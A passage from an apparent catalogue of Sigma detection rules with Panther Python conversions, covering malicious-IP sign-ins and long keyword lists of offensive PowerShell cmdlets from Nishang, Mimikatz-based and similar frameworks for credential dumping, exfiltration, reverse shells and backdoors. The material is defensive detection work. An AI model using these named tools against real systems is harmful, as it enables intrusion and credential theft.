            - 'IMPHASH=70e1caa5a322b56fd7951f1b2caacb0d'
            - 'IMPHASH=beceab354c66949088c9e5ed1f1ff2a4'
            - 'IMPHASH=caa08a0ba5f679b1e5bbae747cb9d626'
            - 'IMPHASH=420625b024fba72a24025defdf95b303'
            - 'IMPHASH=65ccc2c578a984c31880b6c5e65257d3'
            - 'IMPHASH=e717abe060bc5c34925fe3120ac22f45'
            - 'IMPHASH=41113a3a832353963112b94f4635a383'
            - 'IMPHASH=3866dd9fe63de457bdbf893bf7050ddf'
            - 'IMPHASH=3fd33d5b3b52e2db91983ac4b1d7a3c4'
            - 'IMPHASH=a998fe47a44bfbf2399968e21cfdf7ca'
            - 'IMPHASH=c9a6e83d931286d1604d1add8403e1e5'
            - 'IMPHASH=cf0eb2dce2ba2c9ff5dd0da794b8b372'
            - 'IMPHASH=ea37e43ffc7cfcba181c5cff37a9be1f'
            - 'IMPHASH=8e35c9460537092672b3c7c14bccc7e0'
            - 'IMPHASH=7bf14377888c429897eb10a85f70266c'
            - 'IMPHASH=b351627263648b1d220bb488e7ec7202'
            - 'IMPHASH=ce10082e1aa4c1c2bd953b4a7208e56a'
            - 'IMPHASH=a7bd820fa5b895fab06f20739c9f24b8'
            - 'IMPHASH=be0dd8b8e045356d600ee55a64d9d197'
            - 'IMPHASH=63fd1582ac2edee50f7ec7eedde38ee8'
            - 'IMPHASH=6c8d5c79a850eecc2fb0291cebda618d'
            - 'IMPHASH=c32d9a9af7f702814e1368c689877f3a'
            - 'IMPHASH=6b387c029257f024a43a73f38afb2629'
            - 'IMPHASH=df43355c636583e56e92142dcc69cc58'
            - 'IMPHASH=e3ee9131742bf9c9d43cb9a425e497dd'
            - 'IMPHASH=c214aac08575c139e48d04f5aee21585'
            - 'IMPHASH=3c5d2ffd06074f1b09c89465cc8bfbf7'
            - 'IMPHASH=059c6bd84285f4960e767f032b33f19b'
            - 'IMPHASH=a09170ef09c55cdca9472c02cb1f2647'
            - 'IMPHASH=fca0f3c7b6d79f494034b9d2a1f5921a'
            - 'IMPHASH=0262d4147f21d681f8519ab2af79283f'
            - 'IMPHASH=832219eb71b8bdb771f1d29d27b0acf4'
            - 'IMPHASH=514298d18002920ee5a917fc34426417'
            - 'IMPHASH=26ceec6572c630bdad60c984e51b7da4'
            - 'IMPHASH=dbf09dd3e675f15c7cc9b4d2b8e6cd90'
            - 'IMPHASH=4b47f6031c558106eee17655f8f8a32f'
            - 'IMPHASH=a6c4a7369500900fc172f9557cff22cf'
            - 'IMPHASH=3b49942ec6cef1898e97f741b2b5df8a'
            - 'IMPHASH=28dc68bb6d6bf4f6b2db8dd7588b2511'
            - 'IMPHASH=27f6dc8a247a22308dd1beba5086b302'
            - 'IMPHASH=7d017945bf90936a6c40f73f91ed02c2'
            - 'IMPHASH=d51f0f6034eb5e45f0ed4e9b7bbc9c97'
            - 'IMPHASH=0ad7da35304c75ccf859bc29fe9ed09e'
            - 'IMPHASH=bf9d32a6ab9effcd2fd6a734e5be98f9'
            - 'IMPHASH=87fd2b54ed568e2294300e164b8c46f7'
            - 'IMPHASH=2de3451f3e7b02970582bb8f9fd8c73a'
            - 'IMPHASH=e97dc162f416bf06745bf9ffdf78a0ff'
            - 'IMPHASH=2a008187d4a73284ddcc43f1b727b513'
            - 'IMPHASH=f8e4844312e81dbdb4e8e95e2ad2c127'
            - 'IMPHASH=4c7cc13a110ccdbb932bb9d7d42efdf4'
            - 'IMPHASH=45bfe170e0cd654bc1e2ae3fca3ac3f4'
            - 'IMPHASH=3db9de43d5d530c10d0cd2d43c7a0771'
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malicious IP Address Sign-In Failure Rate

Indicates sign-in from a malicious IP address based on high failure rates.

status test author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' id a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd

panther query

def rule(event):
    if event.deep_get("riskEventType", default="") == "maliciousIPAddress":
        return True
    return False

view Sigma YAML

title: Malicious IP Address Sign-In Failure Rate
id: a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd
status: test
description: Indicates sign-in from a malicious IP address based on high failure rates.
references:
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
    - attack.t1090
    - attack.command-and-control
logsource:
    product: azure
    service: riskdetection
detection:
    selection:
        riskEventType: 'maliciousIPAddress'
    condition: selection
falsepositives:
    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high

Convert to SIEM query

high

Malicious IP Address Sign-In Suspicious

Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.

status test author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' id 36440e1c-5c22-467a-889b-593e66498472

panther query

def rule(event):
    if event.deep_get("riskEventType", default="") == "suspiciousIPAddress":
        return True
    return False

view Sigma YAML

title: Malicious IP Address Sign-In Suspicious
id: 36440e1c-5c22-467a-889b-593e66498472
status: test
description: Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.
references:
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
    - attack.t1090
    - attack.command-and-control
logsource:
    product: azure
    service: riskdetection
detection:
    selection:
        riskEventType: 'suspiciousIPAddress'
    condition: selection
falsepositives:
    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high

Convert to SIEM query

high

Malicious Nishang PowerShell Commandlets

Detects Commandlet names and arguments from the Nishang exploitation framework

status test author Alec Costello id f772cee9-b7c2-4cb2-8f07-49870adc02e0

panther query

def rule(event):
    if any(
        [
            "Add-ConstrainedDelegationBackdoor" in event.deep_get("ScriptBlockText", default=""),
            "Copy-VSS" in event.deep_get("ScriptBlockText", default=""),
            "Create-MultipleSessions" in event.deep_get("ScriptBlockText", default=""),
            "DataToEncode" in event.deep_get("ScriptBlockText", default=""),
            "DNS_TXT_Pwnage" in event.deep_get("ScriptBlockText", default=""),
            "Do-Exfiltration-Dns" in event.deep_get("ScriptBlockText", default=""),
            "Download_Execute" in event.deep_get("ScriptBlockText", default=""),
            "Download-Execute-PS" in event.deep_get("ScriptBlockText", default=""),
            "DownloadAndExtractFromRemoteRegistry" in event.deep_get("ScriptBlockText", default=""),
            "DumpCerts" in event.deep_get("ScriptBlockText", default=""),
            "DumpCreds" in event.deep_get("ScriptBlockText", default=""),
            "DumpHashes" in event.deep_get("ScriptBlockText", default=""),
            "Enable-DuplicateToken" in event.deep_get("ScriptBlockText", default=""),
            "Enable-Duplication" in event.deep_get("ScriptBlockText", default=""),
            "Execute-Command-MSSQL" in event.deep_get("ScriptBlockText", default=""),
            "Execute-DNSTXT-Code" in event.deep_get("ScriptBlockText", default=""),
            "Execute-OnTime" in event.deep_get("ScriptBlockText", default=""),
            "ExetoText" in event.deep_get("ScriptBlockText", default=""),
            "exfill" in event.deep_get("ScriptBlockText", default=""),
            "ExfilOption" in event.deep_get("ScriptBlockText", default=""),
            "FakeDC" in event.deep_get("ScriptBlockText", default=""),
            "FireBuster" in event.deep_get("ScriptBlockText", default=""),
            "FireListener" in event.deep_get("ScriptBlockText", default=""),
            "Get-Information " in event.deep_get("ScriptBlockText", default=""),
            "Get-PassHints" in event.deep_get("ScriptBlockText", default=""),
            "Get-Web-Credentials" in event.deep_get("ScriptBlockText", default=""),
            "Get-WebCredentials" in event.deep_get("ScriptBlockText", default=""),
            "Get-WLAN-Keys" in event.deep_get("ScriptBlockText", default=""),
            "HTTP-Backdoor" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-AmsiBypass" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-BruteForce" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-CredentialsPhish" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-Decode" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-Encode" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-Interceptor" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-JSRatRegsvr" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-JSRatRundll" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-MimikatzWDigestDowngrade" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-NetworkRelay" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-PowerShellIcmp" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-PowerShellUdp" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-Prasadhak" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-PSGcat" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-PsGcatAgent" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-SessionGopher" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-SSIDExfil" in event.deep_get("ScriptBlockText", default=""),
            "LoggedKeys" in event.deep_get("ScriptBlockText", default=""),
            "Nishang" in event.deep_get("ScriptBlockText", default=""),
            "NotAllNameSpaces" in event.deep_get("ScriptBlockText", default=""),
            "Out-CHM" in event.deep_get("ScriptBlockText", default=""),
            "OUT-DNSTXT" in event.deep_get("ScriptBlockText", default=""),
            "Out-HTA" in event.deep_get("ScriptBlockText", default=""),
            "Out-RundllCommand" in event.deep_get("ScriptBlockText", default=""),
            "Out-SCF" in event.deep_get("ScriptBlockText", default=""),
            "Out-SCT" in event.deep_get("ScriptBlockText", default=""),
            "Out-Shortcut" in event.deep_get("ScriptBlockText", default=""),
            "Out-WebQuery" in event.deep_get("ScriptBlockText", default=""),
            "Out-Word" in event.deep_get("ScriptBlockText", default=""),
            "Parse_Keys" in event.deep_get("ScriptBlockText", default=""),
            "Password-List" in event.deep_get("ScriptBlockText", default=""),
            "Powerpreter" in event.deep_get("ScriptBlockText", default=""),
            "Remove-Persistence" in event.deep_get("ScriptBlockText", default=""),
            "Remove-PoshRat" in event.deep_get("ScriptBlockText", default=""),
            "Remove-Update" in event.deep_get("ScriptBlockText", default=""),
            "Run-EXEonRemote" in event.deep_get("ScriptBlockText", default=""),
            "Set-DCShadowPermissions" in event.deep_get("ScriptBlockText", default=""),
            "Set-RemotePSRemoting" in event.deep_get("ScriptBlockText", default=""),
            "Set-RemoteWMI" in event.deep_get("ScriptBlockText", default=""),
            "Shellcode32" in event.deep_get("ScriptBlockText", default=""),
            "Shellcode64" in event.deep_get("ScriptBlockText", default=""),
            "StringtoBase64" in event.deep_get("ScriptBlockText", default=""),
            "TexttoExe" in event.deep_get("ScriptBlockText", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malicious Nishang PowerShell Commandlets
id: f772cee9-b7c2-4cb2-8f07-49870adc02e0
status: test
description: Detects Commandlet names and arguments from the Nishang exploitation framework
references:
    - https://github.com/samratashok/nishang
author: Alec Costello
date: 2019-05-16
modified: 2023-01-16
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - 'Add-ConstrainedDelegationBackdoor'
            # - 'Add-Persistence' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            # - 'Add-RegBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            # - 'Add-ScrnSaveBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Copy-VSS'
            - 'Create-MultipleSessions'
            - 'DataToEncode'
            - 'DNS_TXT_Pwnage'
            - 'Do-Exfiltration-Dns'
            - 'Download_Execute'
            - 'Download-Execute-PS'
            - 'DownloadAndExtractFromRemoteRegistry'
            - 'DumpCerts'
            - 'DumpCreds'
            - 'DumpHashes'
            - 'Enable-DuplicateToken'
            - 'Enable-Duplication'
            - 'Execute-Command-MSSQL'
            - 'Execute-DNSTXT-Code'
            - 'Execute-OnTime'
            - 'ExetoText'
            - 'exfill'
            - 'ExfilOption'
            - 'FakeDC'
            - 'FireBuster'
            - 'FireListener'
            - 'Get-Information ' # Space at the end is required. Otherwise, we get FP with Get-InformationBarrierReportDetails or Get-InformationBarrierReportSummary
            # - 'Get-PassHashes' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Get-PassHints'
            - 'Get-Web-Credentials'
            - 'Get-WebCredentials'
            - 'Get-WLAN-Keys'
            # - 'Gupt-Backdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'HTTP-Backdoor'
            # - 'Invoke-ADSBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Invoke-AmsiBypass'
            - 'Invoke-BruteForce'
            - 'Invoke-CredentialsPhish'
            - 'Invoke-Decode'
            - 'Invoke-Encode'
            - 'Invoke-Interceptor'
            - 'Invoke-JSRatRegsvr'
            - 'Invoke-JSRatRundll'
            - 'Invoke-MimikatzWDigestDowngrade'
            - 'Invoke-NetworkRelay'
            # - 'Invoke-PortScan' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            # - 'Invoke-PoshRatHttp' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Invoke-PowerShellIcmp'
            - 'Invoke-PowerShellUdp'
            - 'Invoke-Prasadhak'
            - 'Invoke-PSGcat'
            - 'Invoke-PsGcatAgent'
            # - 'Invoke-PsUACme' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Invoke-SessionGopher'
            - 'Invoke-SSIDExfil'
            # - Jitter  # Prone to FPs
            # - 'Keylogger' # Too generic to be linked to Nishang
            - 'LoggedKeys'
            - 'Nishang'
            - 'NotAllNameSpaces' # This is param to "Set-RemoteWMI"
            - 'Out-CHM'
            - 'OUT-DNSTXT'
            - 'Out-HTA'
            - 'Out-RundllCommand'
            - 'Out-SCF'
            - 'Out-SCT'
            - 'Out-Shortcut'
            - 'Out-WebQuery'
            - 'Out-Word'
            - 'Parse_Keys'
            - 'Password-List'
            - 'Powerpreter'
            - 'Remove-Persistence'
            - 'Remove-PoshRat'
            - 'Remove-Update'
            - 'Run-EXEonRemote'
            - 'Set-DCShadowPermissions'
            - 'Set-RemotePSRemoting'
            - 'Set-RemoteWMI'
            - 'Shellcode32'
            - 'Shellcode64'
            - 'StringtoBase64'
            - 'TexttoExe'
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malicious PowerShell Commandlets - PoshModule

Detects Commandlet names from well-known PowerShell exploitation frameworks

status test author Nasreddine Bencherchali (Nextron Systems) id 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c

panther query

def rule(event):
    if any(
        [
            "Add-Exfiltration" in event.deep_get("Payload", default=""),
            "Add-Persistence" in event.deep_get("Payload", default=""),
            "Add-RegBackdoor" in event.deep_get("Payload", default=""),
            "Add-RemoteRegBackdoor" in event.deep_get("Payload", default=""),
            "Add-ScrnSaveBackdoor" in event.deep_get("Payload", default=""),
            "BadSuccessor" in event.deep_get("Payload", default=""),
            "Check-VM" in event.deep_get("Payload", default=""),
            "ConvertTo-Rc4ByteStream" in event.deep_get("Payload", default=""),
            "Decrypt-Hash" in event.deep_get("Payload", default=""),
            "Disable-ADIDNSNode" in event.deep_get("Payload", default=""),
            "Disable-MachineAccount" in event.deep_get("Payload", default=""),
            "Do-Exfiltration" in event.deep_get("Payload", default=""),
            "Enable-ADIDNSNode" in event.deep_get("Payload", default=""),
            "Enable-MachineAccount" in event.deep_get("Payload", default=""),
            "Enabled-DuplicateToken" in event.deep_get("Payload", default=""),
            "Exploit-Jboss" in event.deep_get("Payload", default=""),
            "Export-ADR" in event.deep_get("Payload", default=""),
            "Export-ADRCSV" in event.deep_get("Payload", default=""),
            "Export-ADRExcel" in event.deep_get("Payload", default=""),
            "Export-ADRHTML" in event.deep_get("Payload", default=""),
            "Export-ADRJSON" in event.deep_get("Payload", default=""),
            "Export-ADRXML" in event.deep_get("Payload", default=""),
            "Find-Fruit" in event.deep_get("Payload", default=""),
            "Find-GPOLocation" in event.deep_get("Payload", default=""),
            "Find-TrustedDocuments" in event.deep_get("Payload", default=""),
            "Get-ADIDNS" in event.deep_get("Payload", default=""),
            "Get-ApplicationHost" in event.deep_get("Payload", default=""),
            "Get-ChromeDump" in event.deep_get("Payload", default=""),
            "Get-ClipboardContents" in event.deep_get("Payload", default=""),
            "Get-FoxDump" in event.deep_get("Payload", default=""),
            "Get-GPPPassword" in event.deep_get("Payload", default=""),
            "Get-IndexedItem" in event.deep_get("Payload", default=""),
            "Get-KerberosAESKey" in event.deep_get("Payload", default=""),
            "Get-Keystrokes" in event.deep_get("Payload", default=""),
            "Get-LSASecret" in event.deep_get("Payload", default=""),
            "Get-MachineAccountAttribute" in event.deep_get("Payload", default=""),
            "Get-MachineAccountCreator" in event.deep_get("Payload", default=""),
            "Get-PassHashes" in event.deep_get("Payload", default=""),
            "Get-RegAlwaysInstallElevated" in event.deep_get("Payload", default=""),
            "Get-RegAutoLogon" in event.deep_get("Payload", default=""),
            "Get-RemoteBootKey" in event.deep_get("Payload", default=""),
            "Get-RemoteCachedCredential" in event.deep_get("Payload", default=""),
            "Get-RemoteLocalAccountHash" in event.deep_get("Payload", default=""),
            "Get-RemoteLSAKey" in event.deep_get("Payload", default=""),
            "Get-RemoteMachineAccountHash" in event.deep_get("Payload", default=""),
            "Get-RemoteNLKMKey" in event.deep_get("Payload", default=""),
            "Get-RickAstley" in event.deep_get("Payload", default=""),
            "Get-Screenshot" in event.deep_get("Payload", default=""),
            "Get-SecurityPackages" in event.deep_get("Payload", default=""),
            "Get-ServiceFilePermission" in event.deep_get("Payload", default=""),
            "Get-ServicePermission" in event.deep_get("Payload", default=""),
            "Get-ServiceUnquoted" in event.deep_get("Payload", default=""),
            "Get-SiteListPassword" in event.deep_get("Payload", default=""),
            "Get-System" in event.deep_get("Payload", default=""),
            "Get-TimedScreenshot" in event.deep_get("Payload", default=""),
            "Get-UnattendedInstallFile" in event.deep_get("Payload", default=""),
            "Get-Unconstrained" in event.deep_get("Payload", default=""),
            "Get-USBKeystrokes" in event.deep_get("Payload", default=""),
            "Get-VaultCredential" in event.deep_get("Payload", default=""),
            "Get-VulnAutoRun" in event.deep_get("Payload", default=""),
            "Get-VulnSchTask" in event.deep_get("Payload", default=""),
            "Grant-ADIDNSPermission" in event.deep_get("Payload", default=""),
            "Gupt-Backdoor" in event.deep_get("Payload", default=""),
            "HTTP-Login" in event.deep_get("Payload", default=""),
            "Install-ServiceBinary" in event.deep_get("Payload", default=""),
            "Install-SSP" in event.deep_get("Payload", default=""),
            "Invoke-ACLScanner" in event.deep_get("Payload", default=""),
            "Invoke-ADRecon" in event.deep_get("Payload", default=""),
            "Invoke-ADSBackdoor" in event.deep_get("Payload", default=""),
            "Invoke-AgentSmith" in event.deep_get("Payload", default=""),
            "Invoke-AllChecks" in event.deep_get("Payload", default=""),
            "Invoke-ARPScan" in event.deep_get("Payload", default=""),
            "Invoke-AzureHound" in event.deep_get("Payload", default=""),
            "Invoke-BackdoorLNK" in event.deep_get("Payload", default=""),
            "Invoke-BadPotato" in event.deep_get("Payload", default=""),
            "Invoke-BetterSafetyKatz" in event.deep_get("Payload", default=""),
            "Invoke-BypassUAC" in event.deep_get("Payload", default=""),
            "Invoke-Carbuncle" in event.deep_get("Payload", default=""),
            "Invoke-Certify" in event.deep_get("Payload", default=""),
            "Invoke-ConPtyShell" in event.deep_get("Payload", default=""),
            "Invoke-CredentialInjection" in event.deep_get("Payload", default=""),
            "Invoke-DAFT" in event.deep_get("Payload", default=""),
            "Invoke-DCSync" in event.deep_get("Payload", default=""),
            "Invoke-DinvokeKatz" in event.deep_get("Payload", default=""),
            "Invoke-DllInjection" in event.deep_get("Payload", default=""),
            "Invoke-DNSUpdate" in event.deep_get("Payload", default=""),
            "Invoke-DNSExfiltrator" in event.deep_get("Payload", default=""),
            "Invoke-DomainPasswordSpray" in event.deep_get("Payload", default=""),
            "Invoke-DowngradeAccount" in event.deep_get("Payload", default=""),
            "Invoke-EgressCheck" in event.deep_get("Payload", default=""),
            "Invoke-Eyewitness" in event.deep_get("Payload", default=""),
            "Invoke-FakeLogonScreen" in event.deep_get("Payload", default=""),
            "Invoke-Farmer" in event.deep_get("Payload", default=""),
            "Invoke-Get-RBCD-Threaded" in event.deep_get("Payload", default=""),
            "Invoke-Gopher" in event.deep_get("Payload", default=""),
            "Invoke-Grouper" in event.deep_get("Payload", default=""),
            "Invoke-HandleKatz" in event.deep_get("Payload", default=""),
            "Invoke-ImpersonatedProcess" in event.deep_get("Payload", default=""),
            "Invoke-ImpersonateSystem" in event.deep_get("Payload", default=""),
            "Invoke-InteractiveSystemPowerShell" in event.deep_get("Payload", default=""),
            "Invoke-Internalmonologue" in event.deep_get("Payload", default=""),
            "Invoke-Inveigh" in event.deep_get("Payload", default=""),
            "Invoke-InveighRelay" in event.deep_get("Payload", default=""),
            "Invoke-KrbRelay" in event.deep_get("Payload", default=""),
            "Invoke-LdapSignCheck" in event.deep_get("Payload", default=""),
            "Invoke-Lockless" in event.deep_get("Payload", default=""),
            "Invoke-MalSCCM" in event.deep_get("Payload", default=""),
            "Invoke-Mimikatz" in event.deep_get("Payload", default=""),
            "Invoke-Mimikittenz" in event.deep_get("Payload", default=""),
            "Invoke-MITM6" in event.deep_get("Payload", default=""),
            "Invoke-NanoDump" in event.deep_get("Payload", default=""),
            "Invoke-NetRipper" in event.deep_get("Payload", default=""),
            "Invoke-Nightmare" in event.deep_get("Payload", default=""),
            "Invoke-NinjaCopy" in event.deep_get("Payload", default=""),
            "Invoke-OfficeScrape" in event.deep_get("Payload", default=""),
            "Invoke-OxidResolver" in event.deep_get("Payload", default=""),
            "Invoke-P0wnedshell" in event.deep_get("Payload", default=""),
            "Invoke-Paranoia" in event.deep_get("Payload", default=""),
            "Invoke-PortScan" in event.deep_get("Payload", default=""),
            "Invoke-PoshRatHttp" in event.deep_get("Payload", default=""),
            "Invoke-PostExfil" in event.deep_get("Payload", default=""),
            "Invoke-PowerDump" in event.deep_get("Payload", default=""),
            "Invoke-PowerDPAPI" in event.deep_get("Payload", default=""),
            "Invoke-PowerShellTCP" in event.deep_get("Payload", default=""),
            "Invoke-PowerShellWMI" in event.deep_get("Payload", default=""),
            "Invoke-PPLDump" in event.deep_get("Payload", default=""),
            "Invoke-PsExec" in event.deep_get("Payload", default=""),
            "Invoke-PSInject" in event.deep_get("Payload", default=""),
            "Invoke-PsUaCme" in event.deep_get("Payload", default=""),
            "Invoke-ReflectivePEInjection" in event.deep_get("Payload", default=""),
            "Invoke-ReverseDNSLookup" in event.deep_get("Payload", default=""),
            "Invoke-Rubeus" in event.deep_get("Payload", default=""),
            "Invoke-RunAs" in event.deep_get("Payload", default=""),
            "Invoke-SafetyKatz" in event.deep_get("Payload", default=""),
            "Invoke-SauronEye" in event.deep_get("Payload", default=""),
            "Invoke-SCShell" in event.deep_get("Payload", default=""),
            "Invoke-Seatbelt" in event.deep_get("Payload", default=""),
            "Invoke-ServiceAbuse" in event.deep_get("Payload", default=""),
            "Invoke-ShadowSpray" in event.deep_get("Payload", default=""),
            "Invoke-Sharp" in event.deep_get("Payload", default=""),
            "Invoke-Shellcode" in event.deep_get("Payload", default=""),
            "Invoke-SMBScanner" in event.deep_get("Payload", default=""),
            "Invoke-Snaffler" in event.deep_get("Payload", default=""),
            "Invoke-Spoolsample" in event.deep_get("Payload", default=""),
            "Invoke-SpraySinglePassword" in event.deep_get("Payload", default=""),
            "Invoke-SSHCommand" in event.deep_get("Payload", default=""),
            "Invoke-StandIn" in event.deep_get("Payload", default=""),
            "Invoke-StickyNotesExtract" in event.deep_get("Payload", default=""),
            "Invoke-SystemCommand" in event.deep_get("Payload", default=""),
            "Invoke-Tasksbackdoor" in event.deep_get("Payload", default=""),
            "Invoke-Tater" in event.deep_get("Payload", default=""),
            "Invoke-Thunderfox" in event.deep_get("Payload", default=""),
            "Invoke-ThunderStruck" in event.deep_get("Payload", default=""),
            "Invoke-TokenManipulation" in event.deep_get("Payload", default=""),
            "Invoke-Tokenvator" in event.deep_get("Payload", default=""),
            "Invoke-TotalExec" in event.deep_get("Payload", default=""),
            "Invoke-UrbanBishop" in event.deep_get("Payload", default=""),
            "Invoke-UserHunter" in event.deep_get("Payload", default=""),
            "Invoke-VoiceTroll" in event.deep_get("Payload", default=""),
            "Invoke-Whisker" in event.deep_get("Payload", default=""),
            "Invoke-WinEnum" in event.deep_get("Payload", default=""),
            "Invoke-winPEAS" in event.deep_get("Payload", default=""),
            "Invoke-WireTap" in event.deep_get("Payload", default=""),
            "Invoke-WmiCommand" in event.deep_get("Payload", default=""),
            "Invoke-WMIExec" in event.deep_get("Payload", default=""),
            "Invoke-WScriptBypassUAC" in event.deep_get("Payload", default=""),
            "Invoke-Zerologon" in event.deep_get("Payload", default=""),
            "MailRaider" in event.deep_get("Payload", default=""),
            "New-ADIDNSNode" in event.deep_get("Payload", default=""),
            "New-DNSRecordArray" in event.deep_get("Payload", default=""),
            "New-HoneyHash" in event.deep_get("Payload", default=""),
            "New-InMemoryModule" in event.deep_get("Payload", default=""),
            "New-MachineAccount" in event.deep_get("Payload", default=""),
            "New-SOASerialNumberArray" in event.deep_get("Payload", default=""),
            "Out-Minidump" in event.deep_get("Payload", default=""),
            "Port-Scan" in event.deep_get("Payload", default=""),
            "PowerBreach" in event.deep_get("Payload", default=""),
            "powercat " in event.deep_get("Payload", default=""),
            "PowerUp" in event.deep_get("Payload", default=""),
            "PowerView" in event.deep_get("Payload", default=""),
            "Remove-ADIDNSNode" in event.deep_get("Payload", default=""),
            "Remove-MachineAccount" in event.deep_get("Payload", default=""),
            "Remove-Update" in event.deep_get("Payload", default=""),
            "Rename-ADIDNSNode" in event.deep_get("Payload", default=""),
            "Revoke-ADIDNSPermission" in event.deep_get("Payload", default=""),
            "Set-ADIDNSNode" in event.deep_get("Payload", default=""),
            "Set-MacAttribute" in event.deep_get("Payload", default=""),
            "Set-MachineAccountAttribute" in event.deep_get("Payload", default=""),
            "Set-Wallpaper" in event.deep_get("Payload", default=""),
            "Show-TargetScreen" in event.deep_get("Payload", default=""),
            "Start-CaptureServer" in event.deep_get("Payload", default=""),
            "Start-Dnscat2" in event.deep_get("Payload", default=""),
            "Start-WebcamRecorder" in event.deep_get("Payload", default=""),
            "Veeam-Get-Creds" in event.deep_get("Payload", default=""),
            "VolumeShadowCopyTools" in event.deep_get("Payload", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malicious PowerShell Commandlets - PoshModule
id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c
related:
    - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
      type: similar
    - id: 02030f2f-6199-49ec-b258-ea71b07e03dc
      type: similar
status: test
description: Detects Commandlet names from well-known PowerShell exploitation frameworks
references:
    - https://adsecurity.org/?p=2921
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare
    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1
    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/Kevin-Robertson/Powermad
    - https://github.com/adrecon/ADRecon
    - https://github.com/adrecon/AzureADRecon
    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-20
modified: 2025-12-10
tags:
    - attack.execution
    - attack.discovery
    - attack.t1482
    - attack.t1087
    - attack.t1087.001
    - attack.t1087.002
    - attack.t1069.001
    - attack.t1069.002
    - attack.t1069
    - attack.t1059.001
logsource:
    product: windows
    category: ps_module
    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
detection:
    selection:
        Payload|contains:
            # Note: Please ensure alphabetical order when adding new entries
            - 'Add-Exfiltration'
            - 'Add-Persistence'
            - 'Add-RegBackdoor'
            - 'Add-RemoteRegBackdoor'
            - 'Add-ScrnSaveBackdoor'
            - 'BadSuccessor'
            - 'Check-VM'
            - 'ConvertTo-Rc4ByteStream'
            - 'Decrypt-Hash'
            - 'Disable-ADIDNSNode'
            - 'Disable-MachineAccount'
            - 'Do-Exfiltration'
